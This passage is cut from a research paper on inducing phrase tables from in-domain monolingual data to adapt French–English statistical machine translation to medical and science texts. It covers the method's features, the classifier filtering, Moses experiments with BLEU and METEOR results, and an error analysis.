monolingual corpus is scored with this formula and only the bigrams with a score above a predefined threshold θ are regarded as phrases. All the iden- tified phrases are transformed into one token,3 and a new pass is performed over the monolingual corpus to obtain new phrases also using the phrases identi- fied in the previous passes. To further limit the num- ber of collected phrases, we consider only phrases containing words that appear at least K times in the monolingual data. After T passes, we compile a set of phrases with (a) all the single words and (b) all the phrases with a length of up to L tokens identi- fied during each pass. Standard SMT systems for close languages di- rectly output OOV tokens in the translation. To be as good as such systems, our approach must be able to retrieve the right translation, especially for the many domain-specific words and phrases that are identical in both source and target languages. To ensure that a source phrase that must remain untranslated has its identity in the target phrase set, we explicitly add in the target phrase set all the source phrases that also appear in the target monolingual data. 3.2 Feature engineering Given two sets of phrases, for the source and target languages, respectively, we regard all possible com- binations of source and target phrases as candidate phrase pairs. This naive coupling imperatively gen- erates a large number of pairs that are mostly noise. Thus, the challenge here is to effectively estimate the reliability of each pair. This section describes sev- eral features to characterize each phrase pair; they are used for evaluating phrase pairs and also added in the induced phrase table to guide the decoder. 3.2.1 Cross-lingual semantic similarity Many researchers tackled the problem of esti- mating cross-lingual semantic similarity between pairs of words or phrases by using their embeddings (Mikolov et al., 2013a; Chandar et al., 2014; Faruqui 3This transformation is performed by simply replacing the space between the two tokens with an underscore. and Dyer, 2014; Coulmance et al., 2015; Gouws et al., 2015; Duong et al., 2016) in combination with either a seed bilingual lexicon or a set of parallel sentence pairs. We estimate monolingual phrase embeddings via the element-wise addition of the word embeddings composing the phrase. This method performs well to estimate phrase embeddings (Mitchell and Lap- ata, 2010; Mikolov et al., 2013a), despite its simplic- ity and relatively low computational cost compared to state-of-the-art methods based on neural networks (Socher et al., 2013a; Socher et al., 2013b) or rich features (Lazaridou et al., 2015). This low computa- tional cost is crucial in our case, as we need to eval- uate a large number of candidate phrase pairs. In order to make source and target phrase em- beddings comparable, we perform a linear projec- tion (Mikolov et al., 2013a) of the embeddings of source phrases to the target embedding space. To learn the projection, we use the method of Mikolov et al. (2013a) with the only exception that we deal with not only words but also phrases. Given train- ing data, i.e., a gold bilingual lexicon, we obtain a translation matrix Ŵ by solving the following opti- mization problem with stochastic gradient descent: Ŵ = arg min W ∑ i ||Wxi −zi||2 where xi is the source phrase embedding of the i-th training data, zi the target phrase embedding of the corresponding gold translation, and W the transla- tion matrix used to project xi such that Wxi is as close as possible to zi in the target embedding space. One important parameter here is the number of di- mensions of word/phrase embeddings. This can be different for the source and target embeddings, but must be smaller than the number of phrase pairs in the training data; otherwise the equation is not solv- able. See Section 4.1 for the details about the bilin- gual lexicon used in our experiment. Given a phrase pair to evaluate, the source phrase embedding is projected to the target embedding space, using Ŵ . Then, we compute the cosine simi- larity between the projected source phrase embed- ding and the target phrase embedding to evaluate the semantic similarity between these phrases; this seems to give satisfying results in this cross-lingual scenario as shown by Mikolov et al. (2013a). A 490 translation matrix is trained for each translation di- rection f → e and e → f, respectively, so that we have two cross-lingual semantic similarity features for each phrase pair. 3.2.2 Lexical translation probabilities We assume the existence of a large amount of general-domain parallel data, and train a regular translation model with lexical translation proba- bilities in an ordinary way. Although in-domain phrases are likely to contain tokens that are unseen in the general-domain parallel data, lexical transla- tion probabilities may be useful to score candidate pair of source and target phrases that contain tokens seen in the general-domain parallel data. To com- pute a phrase-level score, for a target phrase e given a source phrase f, we consider all possible word alignments as follows: Plex(e|f) = 1 I I∑ i=1 log (1 J J∑ j=1 p(ei|fj) ) where I and J are the lengths of e and f, respec- tively, and p(ei|fj) the lexical translation probability of the i-th target word ei of e given the j-th source word fj of f. Such phrase-level lexical translation probabilities are computed for both translation di- rections giving us two features. 3.2.3 Other features As demonstrated by previous work (Irvine and Callison-Burch, 2014; Irvine and Callison-Burch, 2016), features based on the frequency of the phrases in the monolingual data may help us to bet- ter score a phrase pair. We add as features the in- versed frequency of the source and target phrases in the in-domain monolingual data, along with their relative difference given by the following formula: simf(e,f) = ∣∣∣∣∣log (freq(e) Ne ) − log (freq(f) Nf )∣∣∣∣∣ where Nx stands for the number of tokens in the in- domain monolingual data of the corresponding lan- guage. The surface-level similarity of source and target phrases can also be a strong clue when considering the translation between two languages that are rela- tively close. We investigate two features concerning this: the first feature is the Levenshtein distance be- tween the two phrases calculated regarding words as units,4 while the other is a binary feature that fires if the two phrases are identical. We shall ex- pect both features to be very useful in cases where many domain-specific words and phrases are writ- ten in the same way in two languages; for instance, drug and molecule names in the medical domain in French and English. We also add as features the lengths of the source and target phrases, i.e., I and J, and their ratio. Using all the above 12 features, the overall score for each pair is given by a classifier as described in Section 3.3; this score is also added as a feature in the induced phrase table for decoding. 3.3 Phrase pair filtering As mentioned above, phrase pairs so far generated are mostly noise. To reduce the decoder’s search space when using our induced phrase table, we rad- ically filter out inappropriate pairs. Each candidate phrase pair is assessed by the method proposed in Irvine and Callison-Burch (2013), which predicts whether a pair of words are translations of one an- other using a classifier. As training examples, we use a bilingual lexicon as positive examples and ran- domly associated phrase pairs from our phrase sets as negative examples. For classification, we use all the features presented in Section 3.2. We use the score given by the classifier to rank the target phrases for each source phrase. Only the target phrases with the top n scores are kept in the final induced phrase table. 4 Experiments This section demonstrates the impact of the in- duced phrase tables in translating in-domain texts in three configurations. In the first configuration (Conf. 1), we evaluated whether our induced phrase table improves the translation of in-domain texts over the vanilla SMT system which used only one phrase table trained from general-domain parallel 4Here we did not use the character-level edit distance to measure the orthographic similarity between phrases. Even though such a feature may be useful (Koehn and Knight, 2002), its computational cost is too high to deal efficiently with billions of phrase pairs. 491 data. We then evaluated, in the second configura- tion (Conf. 2), whether our induced phrase table is also beneficial when used in an SMT system that already incorporates an in-domain bilingual lexicon that could be created manually or induced by some of the methods mentioned in Section 2. Finally, we evaluated in complementary experiments (Conf. 3) whether our induced phrase table can also offer use- ful information to improve translation quality even when used in combination with another standard phrase table generated from in-domain parallel data. 4.1 Data Since our approach assumes the availability of large- scale general-domain parallel and monolingual cor- pora, we considered the French–English language pair and both translation directions for our experi- ments. The French–English version of the Europarl parallel corpus5 was regarded as a general-domain, and not strictly out-of-domain, corpus because many debates can be associated to a specific domain and can contain phrases specific to particular domains. As general-domain monolingual data, we used the concatenation of one side of Europarl and the 2007– 2014 editions of News Crawl corpora6 in the same language. We focused on two domains: medical (EMEA) and science (Science). For both domains, we used the development and test sets provided for a work- shop on domain adaptation of MT (Carpuat et al., 2012).7 We also used the provided in-domain par- allel data for training but regarded only the target side as monolingual data. Since our primary ob- jective is the induction of a phrase table without using in-domain parallel data, the source side of the in-domain parallel data was not used as a part of the source in-domain monolingual data, except when training an ordinary in-domain phrase table in Conf. 3. As medical domain monolingual data for the EMEA translation task, we used the French and English monolingual medical data provided for the WMT’14 medical translation task.8 None of 5http://statmt.org/europarl/, release 7 6http://statmt.org/wmt15/ translation-task.html 7http://hal3.name/damt/ 8http://www.statmt.org/wmt14/ medical-task/ Domain Data # sent. # tok. (En-Fr) EMEA development 2,022 28k-32k test 2,045 25k-29k parallel 472k 6M-7M monolingual 275M-255M Science development 1,990 52k-65k test 1,982 52k-65k parallel 66k 2M-2M monolingual 82M-2M General parallel 2M 54M-60M monolingual 2.8B-1.1B Table 1: Statistics on train, development, and test data. the parallel corpora provided for the WMT’14 med- ical translation task was used. As science domain monolingual data for the Science translation task, we used the English side of the ASPEC parallel cor- pus (Nakazawa et al., 2016).9 Unfortunately, we did not find any French monolingual corpora pub- licly available for the Science domain that were suf- ficiently large enough for our experiments. Statistics on the data we used are presented in Table 1. To induce the phrase tables from the monolin- gual data, we compared two bilingual lexicons: a general-domain and an in-domain lexicons. These lexicons are used to train the translation matrices (see Section 3.2.1) and to train the classifier (see Section 3.3). The general-domain lexicon (hence- forth, gen-lex) is a phrase-based one extracted from the phrase table built on the general-domain parallel data (see Section 4.3). We extracted the 5,000 most frequent source phrases and their most probable translation according to the forward trans- lation probability, p(e|f). We adopted this size as it had been proven optimal to learn the mapping between two monolingual embedding spaces (Vulić and Korhonen, 2016). For some experiments, we also simulated the availability of an in-domain bilin- gual lexicon. We automatically generated a lexicon for each domain (henceforth, in-lex) using the entire in-domain parallel data, in the same manner as compiling gen-lex, except that we selected the 5,000 most frequent source words in the in-domain parallel data that were not in the 5,000 most frequent words in the general-domain parallel data in order 9http://orchid.kuee.kyoto-u.ac.jp/ ASPEC/ 492 Side Domain Data w2p w2v source general monolingual √ in-domain monolingual √ √ parallel ( √ ) ( √ ) development √ test √ target general monolingual √ in-domain monolingual √ √ parallel √ √ Table 2: Corpora used for extracting phrases and comput- ing word embeddings: w2p indicates word2phrase, while w2v for word2vec. ( √ ) denotes that the data are used in Conf. 3 only. to ensure that we obtained mostly in-domain word pairs. Note that we did not use phrases but words for in-lex, assuming that humans are not able to manually construct a lexicon comprising phrase pairs similar to those in phrase tables for SMT sys- tems. For Conf. 3, as we assume the availabil- ity of in-domain parallel data, the bilingual lexi- con (para-lex) used was 5,000 phrase pairs ex- tracted from the in-domain phrase table, excluding the source phrases of gen-lex. 4.2 Tools and parameters A summary of the data used to collect phrases and estimate word embeddings is presented by Table 2. For each pair of domain and translation direc- tion, sets of source and target phrases were extracted from the in-domain monolingual data, as described in Section 3.1. As in previous work (Irvine and Callison-Burch, 2014; Saluja et al., 2014; Zhao et al., 2015), we focus on source phrases appearing in the development and test sets in order to maximize the coverage of our induced phrase table for them.10 More precisely, source phrases were collected from 10We are aware that this may not be practical because it requires the knowledge of the development and test sets be- forehand. For instance for the Fr→En EMEA translation task, inducing a phrase table given all the 4.5M collected source phrase would required approximately 3 months using 100 CPU threads. Increasing the value of K to collect less source phrases can be a reasonable alternative to significantly decrease this computation time, even though it will also necessarily decrease the coverage of the phrase table. We leave for our future work the study of a phrase table induction with source phrases ex- tracted from source monolingual data without referring to the development and test sets. Task source target # phrase all dev+test pairs EMEA Fr→En 4.5M 20k 437k 8.7B En→Fr 5.1M 11k 469k 5.2B Science Fr→En 1.1M 28k 216k 6.0B En→Fr 2.3M 24k 18k 432M Table 3: Size of the phrase sets collected from the source and target in-domain monolingual data and the number of phrases appearing only in the concatenation of the source side of the development and test sets (dev+test). “# phrase pairs” denotes the number of phrase pairs as- sessed by the classifier. the concatenation of the development and test sets and the in-domain monolingual data with reliable statistics, and then only phrases appearing in the de- velopment and test sets were filtered.11 We removed phrases containing tokens unseen in the in-domain monolingual data, because we are unable to com- pute all our features for them. On the other hand, target phrases were collected from the in-domain monolingual data, including the target side of in- domain parallel data. To identify phrases, we used the word2phrase tool included in the word2vec package,12 with the default values for δ and θ. We set K = 1 for the source language to ensure that most of the tokens would be translated, and K = 25 for the target language to limit the number of result- ing phrases. We set L = 6 as this is the same max- imal phrase length that we set for the phrase tables trained from the parallel data. We stopped at T = 4 passes as the fifth pass retrieved only a very small number of new phrases compared to the fourth pass. Statistics of the collected phrases for each task are presented in Table 3. To train the word embeddings, we used word2vec with the following parameters: -cbow 1 -window 10 -negative 15 -sample 1e-4 -iter 15 -min-count 1. Mikolov et al. (2013a) observed that better results for cross- lingual semantic similarity were obtained when using word embeddings with higher dimensions 11As we had no French monolingual corpus for the Science domain, the development and test sets for the Science Fr→En task were concatenated with one million sentences randomly extracted from the general-domain monolingual data. 12https://code.google.com/archive/p/ word2vec/ 493 Data LM1 LM2 LM3 Target side of in-domain parallel data √ √ √ In-domain monolingual data √ √ General-domain monolingual data √ Table 4: Source of our three language models. on the source side than on the target side. We therefore chose 800 and 300 dimensions for the source and target embeddings, respectively. The embeddings were trained on the concatenation of all the general-domain and in-domain monolingual data as presented by Table 2. Consequently, for each pair of domain and translation direction, we have four word embedding spaces: those with 300 or 800 dimensions for source and target languages. The reliability of each phrase pair was estimated as described in Section 3.3 to compile phrase tables of reasonable size and quality. We used Vowpal Wabbit13 to perform logistic regression with one pass, default parameters, and --link logistic option to obtain a classification score for each phrase pair. In the final induced phrase table, we kept the 300 best target phrases14 for each source phrase ac- cording to this score. 4.3 SMT systems The Moses toolkit (Koehn et al., 2007)15 was used for training SMT models, parameter tuning, and de- coding. The phrase tables were trained on the par- allel corpus using SyMGIZA++ (Junczys-Dowmunt and Szał, 2012)16 with IBM-2 word alignment and the grow-diag-final-and heuristics. To ob- tain strong baseline systems, all SMT systems used three language models17 built on different sets of corpora as shown in Table 4; each language model is a 4-gram modified Kneser-Ney smoothed one 13https://github.com/JohnLangford/ vowpal_wabbit/ 14As in Irvine and Callison-Burch (2014), we obtained bet- ter results when favoring recall over precision. We chose 300 empirically since we did not observe any further improvements when keeping more target phrases. 15http://statmt.org/moses/, version 2.1.1 16https://github.com/emjotde/symgiza-pp/ 17The one exception is the system for the Science En→Fr task, which uses only two language models as we do not have any in-domain monolingual data in addition to the target side of the in-domain parallel data. Phrase table Conf. 1 Conf. 2 Conf. 3 Phrase table trained from √ √ √ general-domain parallel data Phrase table trained from √ in-domain parallel data In-domain bilingual lexicon √ Phrase table induced from √ √ √ in-domain monolingual data Table 5: Multiple phrase table configurations. trained using lmplz (Heafield et al., 2013).18 To concentrate on the translation model, we did not use the lexical reordering model throughout the experi- ments, while we enabled distance-based reordering up to six words. Our systems used the multiple decoding paths ability of Moses; we used up to three phrase tables in one system, as summarized in Table 5. We did not add the features presented in Section 3.2 to the phrase pairs directly derived from the parallel data.19 Weights of the features were optimized with kb-mira (Cherry and Foster, 2012) using 200-best hypotheses on 15 iterations. The translation out- puts were evaluated with BLEU (Papineni et al., 2002) and METEOR (Denkowski and Lavie, 2014). The results were averaged over three tuning runs. The statistical significance was measured by ap- proximate randomization (Clark et al., 2011) using MultEval.20 4.4 Additional baseline systems To compare our work with a state-of-the-art phrase table induction method, we implemented the work of Zhao et al. (2015). Even though they did not pro- pose their method to perform domain adaptation of an SMT system, their work is the closest to ours and does not require other external resources than those we used, i.e., parallel data and monolingual data not necessarily comparable. We implemented both global (GLP) and local (LLP) linear projection strategies and collected source and target phrases as they did. The source phrase set contains all uni- 18https://kheafield.com/code/kenlm/ estimation 19As in Irvine and Callison-Burch (2014), we got a drop of up to 0.5 BLEU points when we added our features, derived from monolingual data, to the original phrase table. 20https://github.com/jhclark/multeval/ 494 grams and bigrams in the development and test sets, while the target phrase set contains unigrams and bigrams collected from the in-domain monolingual data. They did not mention any filtering of their phrase sets, but we chose to remove all phrases con- taining digits or punctuation marks, since trying to retrieve the translation of numbers or punctuation marks relying only on word embeddings seems in- appropriate and in fact produced worse results in our preliminary experiments. To highlight the impact of the phrase sets used, we also experimented LLP us- ing our phrase sets collected with word2phrase. Furthermore, to get the best possible results, we did not use the search approximations presented in Zhao et al. (2015), i.e., local sensitive hashing and redun- dant bit vector, and used instead linear search. For the GLP configuration, the translation ma- trix was trained on gen-lex, i.e., 5,000 phrase pairs extracted from the general-domain phrase ta- ble trained on parallel data. For the LLP configura- tions, as in Zhao et al. (2015), we trained the trans- lation matrix for each source phrase on the 500 most similar source phrases, retrieved from the general- domain phrase table, associated to their most prob- able translation. For both GLP and LLP config- urations, we kept the 300 best target phrases for each source phrase. Four features, phrase and lex- ical translation probabilities for both translation di- rections, were approximated using the similarity be- tween source and target phrase embeddings for each phrase pair and included in the induced phrase table as described by Zhao et al. (2015). Since this approach proposes to translate all OOV unigrams and bigrams, it is likely in our scenario that some medical terms, for instance, will have no correct translations in the induced phrase table. For a comparison, we added one more baseline system, which merely uses a vanilla Moses with the -du op- tion of Moses activated to drop all unknown words instead of copying them into the translation. 4.5 Results The experimental results are given in Table 6. In Conf. 1, our results show that both GLP and LLP configurations performed much worse than the vanilla Moses when using phrases naively collected. This is due to the fact that the induced phrase ta- ble contains translations for every OOV unigrams and bigrams, even for those who do not need to be translated, such as molecule names or place names. Word embeddings are well-known to be inaccurate for very infrequent words (Mikolov et al., 2013b); consequently, for some rare source phrases, even if the right translation is in the target phrase set, it is not guaranteed that it will be registered in the in- duced phrase table as one of the 300 best translations for the source phrase, relying only on word embed- dings. The significant improvements over a vanilla Moses observed by Zhao et al. (2015) would poten- tially be because they translated from Arabic, and Urdu, to English. For such language pairs, one can safely try to translate every OOV token of a general- domain text, and it is unlikely to do worse than a vanilla Moses system that will leave the OOV to- kens as is in the translation. As shown by the Moses du configurations, dropping them led to a drop of up to 4.2 BLEU points for the EMEA Fr→En trans- lation task. This suggests that OOV tokens must be carefully translated only when necessary. Many OOV tokens in our translation tasks do not need to be translated into different forms. Hence, we regard the vanilla Moses that copies the OOV tokens in the translation a strong baseline system. Interestingly, using the phrases collected by our method for LLP produced much better translations, even slightly better than the one produced by the vanilla Moses system for the EMEA En→Fr transla- tion task with an improvement of 0.2 BLEU points. This may be due to the fact that our source phrase set is not only made from OOV phrases, mean- ing that new useful translations may be proposed for source phrases that are already registered in the general-domain phrase table. Moreover, with our phrase sets, the decoder also has the possibility to leave some tokens untranslated since we added each source phrase in the target phrase set if it appeared in the target monolingual data. Instead of relying only on word embeddings, the features used in our approach helped significantly to improve the translation quality. When we added our induced phrase table to a vanilla Moses system, we observed consistent and significant improvements in translation quality, with up to 2.1 BLEU and 2.2 METEOR points of improvement for the Science En→Fr translation task. Compared to the LLP method proposed by Zhao 495 Configuration EMEA Science Fr→En En→Fr Fr→En En→Fr BLEU METEOR BLEU METEOR BLEU METEOR BLEU METEOR vanilla Moses du 24.2 27.4 21.7 40.0 22.3 29.1 20.4 42.7 vanilla Moses (Conf. 1) 28.4 30.1 25.4 44.8 24.1 30.4 22.7 45.1 + GLP IPT naive 24.3 27.0 22.3 41.0 22.4 29.0 20.6 42.6 + LLP IPT naive 24.7 27.4 22.0 40.4 22.5 29.3 21.1 43.4 + LLP IPT 27.9 29.6 25.6 45.1 22.7 29.3 21.3 43.5 + our IPT (gen-lex) 30.2 32.1 27.1 46.6 25.4 32.0 24.8 47.3 + in-domain bilingual lexicon (Conf. 2) 32.4 32.8 28.3 48.2 26.6 32.4 24.9 48.0 + our IPT (gen-lex) 33.5 32.6 28.8 48.6 28.5 33.8 25.2 48.4 + our IPT (in-lex) 33.8 32.9 29.2 48.9 26.9 32.7 25.9 49.0 + in-domain phrase table (Conf. 3) 39.1 36.1 33.8 53.1 32.1 36.1 31.0 53.9 + our IPT (para-lex) 39.1 36.1 34.0 53.2 32.1 36.1 31.2 54.1 Table 6: Results (BLEU and METEOR) with an induced phrase table (IPT). The Moses du and vanilla Moses systems use only one phrase table trained from the general-domain parallel data. The translation matrices and the classifiers have been trained with a bilingual lexicon: gen-lex, in-lex, or para-lex. The configurations denoted as “naive” use a phrase table induced from phrases collected as described in Section 4.4. Bold scores indicate the statistical significance (p < 0.01) of the gain over the baseline system (Conf. X) in each configuration. et al. (2015), our approach includes more features and an additional classification step. Thus, the in- duction of a phrase table is much slower. For in- stance, for the EMEA Fr→En translation task, using the phrase sets extracted with word2phrase, our induction method (excluding phrase collection) was nearly 14 times slower (9 hours vs. 38 minutes).21 Phrase collection using word2phrase was much faster than feature computation and phrase pair clas- sification. For instance, it took 72 minutes to col- lect target phrases for the EMEA Fr→En transla- tion task, using four iterations of word2phrase on the English in-domain monolingual data with 1 CPU thread. In Conf. 2, adding an in-domain bilingual lexi- con as a phrase table to the vanilla baseline sys- tem significantly boosted the performance, mainly by reducing the number of OOV tokens. Our in- duced phrase tables had less impact, probably due to the overlap between useful word pairs contained in both the induced phrase table and the added bilin- gual lexicon. However, we still observed significant improvements, which support the usefulness of the 21The experiments were performed with 20 CPU threads. Note also that computational speed was not our primary fo- cus when implementing our approach. Optimizing our imple- mentation may lead to significant gains in speed, while Zhao et al. (2015) have presented a search approximation able to make their approach 18 times faster than linear search. induced phrase table, with up to 1.4 and 1.0 BLEU points of improvements, respectively, for the EMEA Fr→En and Science En→Fr translation tasks for in- stance. In this configuration, the in-lex phrase table led to slight but consistent improvements. It helped more than the gen-lex phrase table, except in the Science Fr→En task, for which the use of the gen-lex phrase table yielded significantly better results than the use of the in-lex phrase table. We can expect such differences when the classifier and the translation matrices are trained using infrequent words. Embeddings for such words are typically not as well estimated as those for frequent words, mean- ing that the features based on the word embeddings are less reliable and thus mislead both the classifier for pruning and the decoder. In Conf. 3, where the baseline system even used a phrase table trained on in-domain parallel data, we obtained contrasted results, with only slight im- provements for the En→Fr translation direction and no improvements for the Fr→En translation direc- tion. This lack of improvement may be due to the more reliable features and more accurate phrase pairs contained in the phrase table directly learned from the parallel data. This may lead the decoder to prefer this table to the induced one and give higher weights of its features according to this preference during tuning. 496 EMEA Science Fr→En En→Fr Fr→En En→Fr w/o w/ w/o w/ w/o w/ w/o w/ correct 53.1 55.1 52.8 54.2 54.0 57.1 55.3 57.2 SEEN 6.6 3.9 7.8 6.1 5.9 2.3 8.5 2.2 SENSE 18.1 13.3 15.6 11.5 18.9 14.0 12.9 12.9 SCORE 22.2 27.7 23.8 28.2 21.2 26.6 23.3 27.7 Table 7: Percentage of the source tokens: comparison of the translations generated with (w/) or without (w/o) our gen-lex induced phrase table (Conf. 1). 5 Error analysis In Section 5.1, we first present an analysis of the dis- tribution of translation errors that our systems pro- duced, using the S4 taxonomy (Irvine et al., 2013). Then, in Section 5.2, we illustrate some translation examples for which our induced phrase tables have produced a better translation. 5.1 Analysis with the S4 taxonomy The S4 taxonomy comprises the following four error types: • SEEN: attempt to translate a word never seen before • SENSE: attempt to translate a word with the wrong sense • SCORE: a good translation for the word is available but another one, giving a better score to the hypothesis, is chosen by the system • SEARCH: a good translation is available for the word but is pruned during the search for the best hypothesis We considered the SEEN, SENSE, and SCORE er- rors as in Irvine et al. (2013), but not the SEARCH errors, assuming that the recent phrase-based SMT systems rarely make this type of errors and with- out impact on the translation quality (Wisniewski et al., 2010; Aziz et al., 2014). We performed a Word Alignment Driven Evaluation (WADE) (Irvine et al., 2013) to count the word-level errors. Table 7 compares the results with and without our gen-lex induced phrase tables (Conf. 1). For the four tasks, more than half of the source tokens were correctly translated according to the translation ref- erence. Our analysis reveals that our induced phrase table helps to obtain more correct translations, as higher percentages of source words were correctly translated, despite the significant increase of SCORE errors (around 5% for all the tasks). This means that the correct translation for the source word is available, but the features associated to this trans- lation were not informative enough for the decoder to choose it. The percentage of SEEN errors in the translations decreased significantly with the induced phrase table for all the tasks, as a result of many words and phrases unseen in the general-domain parallel data being covered by using the in-domain monolingual data. However, our method does not guarantee to find appropriate translations for these words. It is even possible that all the proposed trans- lations are inappropriate. Nonetheless, we can see a noticeable decrease of the SENSE errors, except in the Science En→Fr task, for which we have used only a small amount of in-domain French mono- lingual data. As reported in Table 3, fewer target phrases were collected for this task, leading to only a small chance of obtaining the right translation for a given source phrase. The percentage of SENSE errors still remains higher than 10% for all tasks, in- dicating that the correct translation is not available in our phrase set or is pruned by the classifier during the phrase table induction. From this analysis, we draw the conclusion that our approach has significantly increased the reach- ability of the translation reference along with the quality of the translation produced by the decoder. We expect that more informative or better estimated features can further improve our results. Improv- ing our method to collect the target phrases or using a larger in-domain monolingual corpus would also help to reduce SENSE errors. 5.2 Translation examples Table 8 presents examples of source phrase and their translations chosen by the decoder in the EMEA Fr→En translation task. As shown by Example #1, both LLP and gen-lex configurations can find a good translation in their induced phrase ta- ble for the phrase “au point d’injection” while the general-domain phrase table does not contain this source phrase. As a result, the vanilla Moses system produced a wrong translation using general-domain word translations. 497 System #1 #2 #3 #4 source au point d’ injection glaucome aigu contient du lactose monohydraté le lansoprazole n’ est pas vanilla Moses at injection acute glaucome monohydraté contains lactose the lansoprazole is not LLP IPT at the point of injection acute contains lactose the , is not our IPT (gen-lex) at the site of injection acute glaucoma contains lactose monohydrate the lansoprazole is not reference at the injection site acute glaucoma contains lactose monohydrate lansoprazole is not Table 8: Examples of source phrase and their translation, from the test set of the EMEA Fr→En translation task, produced by the decoder using different configurations: vanilla Moses (Conf. 1) and Moses using a phrase table induced with LLP or with our method (gen-lex). Example #2 shows a typical error made by the LLP configuration. In this example, “glaucome” is OOV, no translation is proposed for this token in the general-domain phrase table. The LLP IPT con- tains the source phrase “glaucome aigu” but none of the 300 best corresponding target phrases contain the token “glaucoma”. However, most of them con- tain the meaning of “acute”. This can be explained by the much higher frequency of “aigu” while the word “glaucome” is very rare, even in the in-domain monolingual data. Consequently, “aigu” has an em- bedding more accurate than the one of “glaucome” which is then much more difficult to project cor- rectly across languages. In contrast, our gen-lex IPT contains the translation reference for “glaucome aigu” and this translation has been used correctly by the decoder, guided by our feature set. Example #3 is similar to Example #2, the embed- ding of the rare word “monohydraté” is probably not accurate enough to be correctly projected, the cor- rect translation is not in the LLP IPT, while our ap- proach succeeded to translate it correctly. Finally, Example #4 presents another common sit- uation where an OOV token, here “lansoprazole” has to be preserved as is and is correctly reported in the translation by the vanilla Moses system. The LLP IPT proposes translations for “lansoprazole”, most of them semantically unrelated, like the one chosen by the decoder in this configuration. We assume that the surface-level similarity fea- tures of our method helped the decoder to identify the right translation in this situation. Nonetheless, even when using our gen-lex IPT, we still ob- served some situations where tokens that should be preserved were actually wrongly translated, produc- ing outputs worse than those produced by the vanilla Moses system. 6 Conclusion and future work We presented a framework to induce a phrase ta- ble from unaligned monolingual data of specific do- mains. We showed that such a phrase table, when integrated to the decoder, consistently and signifi- cantly improved the translation quality for texts in the targeted domain. Our approach uses only sim- ple features without requiring strongly comparable or annotated texts in the targeted domain. Our method could further be improved in several ways. First, we expect better improvements by using more in-domain monolingual data or by being more careful in collecting the target phrases to use for the phrase table induction as opposed to simply pruning them according to the word frequency. Moreover, as we saw in Section 5, scoring the phrase pairs is one of the most important issues. We need more in- formative features to better score the pairs of source and target phrases. Despite their high computational cost, including features based on orthographic simi- larity or using better estimated cross-lingual embed- dings may help for this purpose. Acknowledgments We would like to thank the anonymous reviewers and the action editor, Chris Quirk, for their insight- ful comments. References Amittai Axelrod, Xiaodong He, and Jianfeng Gao. 2011. Domain Adaptation via Pseudo In-Domain Data Se- lection. In Proceedings of EMNLP, Edinburgh, Scot- land, UK. Wilker Aziz, Marc Dymetman, and Lucia Specia. 2014. Exact Decoding for Phrase-Based Statistical Machine Translation. In Proceedings of EMNLP, Doha, Qatar. 498 Marine Carpuat, Hal Daumé III, Alexander Fraser, Chris Quirk, Fabienne Braune, Ann Clifton, et al. 2012. Do- main adaptation in machine translation: Final report. In 2012 Johns Hopkins summer workshop final report. Baltimore, MD: Johns Hopkins University. A. P. Sarath Chandar, Stanislas Lauly, Hugo Larochelle, Mitesh M Khapra, Balaraman Ravindran, Vikas Raykar, and Amrita Saha. 2014. An Autoencoder Ap- proach to Learning Bilingual Word Representations. In Proceedings of NIPS, Montréal, Canada. Colin Cherry and George Foster. 2012. Batch Tuning Strategies for Statistical Machine Translation. In Pro- ceedings of NAACL-HLT, Montréal, Canada. Jonathan H. Clark, Chris Dyer, Alon Lavie, and Noah A. Smith. 2011. Better Hypothesis Testing for Statis- tical Machine Translation: Controlling for Optimizer Instability. In Proceedings of ACL-HLT, Portland, OR, USA. Jocelyn Coulmance, Jean-Marc Marty, Guillaume Wen- zek, and Amine Benhalloum. 2015. Trans-gram, Fast Cross-lingual Word-embeddings. In Proceedings of EMNLP, Lisbon, Portugal. Hal Daumé, III and Jagadeesh Jagarlamudi. 2011. Do- main Adaptation for Machine Translation by Mining Unseen Words. In Proceedings of ACL-HLT, Portland, OR, USA. Michael Denkowski and Alon Lavie. 2014. Meteor Universal: Language Specific Translation Evaluation for Any Target Language. In Proceedings of EACL, Gothenburg, Sweden. Qing Dou and Kevin Knight. 2012. Large Scale Deci- pherment for Out-of-domain Machine Translation. In Proceedings of EMNLP-CoNLL, Jeju Island, Korea. Long Duong, Hiroshi Kanayama, Tengfei Ma, Steven Bird, and Trevor Cohn. 2016. Learning Crosslingual Word Embeddings without Bilingual Corpora. In Pro- ceedings of EMNLP, Austin, TX, USA. Manaal Faruqui and Chris Dyer. 2014. Improving Vector Space Word Representations Using Multilingual Cor- relation. In Proceedings of EACL, Gothenburg, Swe- den. Pascale Fung and Percy Cheung. 2004. Mining Very- Non-Parallel Corpora: Parallel Sentence and Lexicon Extraction via Bootstrapping and EM. In Proceedings of EMNLP, Barcelona, Spain. Pascale Fung. 1995. Compiling Bilingual Lexicon En- tries From a Non-Parallel English-Chinese Corpus. In Proceedings of the 3rd Workshop on Very Large Cor- pora, Cambridge, MA, USA. Stephan Gouws, Yoshua Bengio, and Greg Corrado. 2015. BilBOWA: Fast Bilingual Distributed Repre- sentations without Word Alignments. In Proceedings of ICML, Lille, France. Aria Haghighi, Percy Liang, Taylor Berg-Kirkpatrick, and Dan Klein. 2008. Learning Bilingual Lexicons from Monolingual Corpora. In Proceedings of ACL- HLT, Colombus, OH, USA. Kenneth Heafield, Ivan Pouzyrevsky, Jonathan H. Clark, and Philipp Koehn. 2013. Scalable Modified Kneser- Ney Language Model Estimation. In Proceedings of ACL, Sofia, Bulgaria. Sanjika Hewavitharana and Stephan Vogel. 2016. Ex- tracting parallel phrases from comparable data for ma- chine translation. Natural Language Engineering, 22(4):549–573. Ann Irvine and Chris Callison-Burch. 2013. Supervised Bilingual Lexicon Induction with Multiple Monolin- gual Signals. In Proceedings of HLT-NAACL, Atlanta, GA, USA. Ann Irvine and Chris Callison-Burch. 2014. Halluci- nating Phrase Translations for Low Resource MT. In Proceedings of CoNLL, Baltimore, MD, USA. Ann Irvine and Chris Callison-Burch. 2016. End- to-End Statistical Machine Translation with Zero or Small Parallel Texts. Natural Language Engineering, 22(4):517–548. Ann Irvine, John Morgan, Marine Carpuat, Hal Daumé III, and Dragos Munteanu. 2013. Measuring Machine Translation Errors in New Domains. Trans- actions of the Association for Computational Linguis- tics, 1. Marcin Junczys-Dowmunt and Arkadiusz Szał. 2012. SyMGiza++: Symmetrized Word Alignment Mod- els for Machine Translation. In Security and Intel- ligent Information Systems (SIIS), volume 7053 of Lecture Notes in Computer Science. Springer-Verlag, Berlin/Heidelberg, Germany. Alex Klementiev, Ann Irvine, Chris Callison-Burch, and David Yarowsky. 2012. Toward Statistical Machine Translation without Parallel Corpora. In Proceedings of 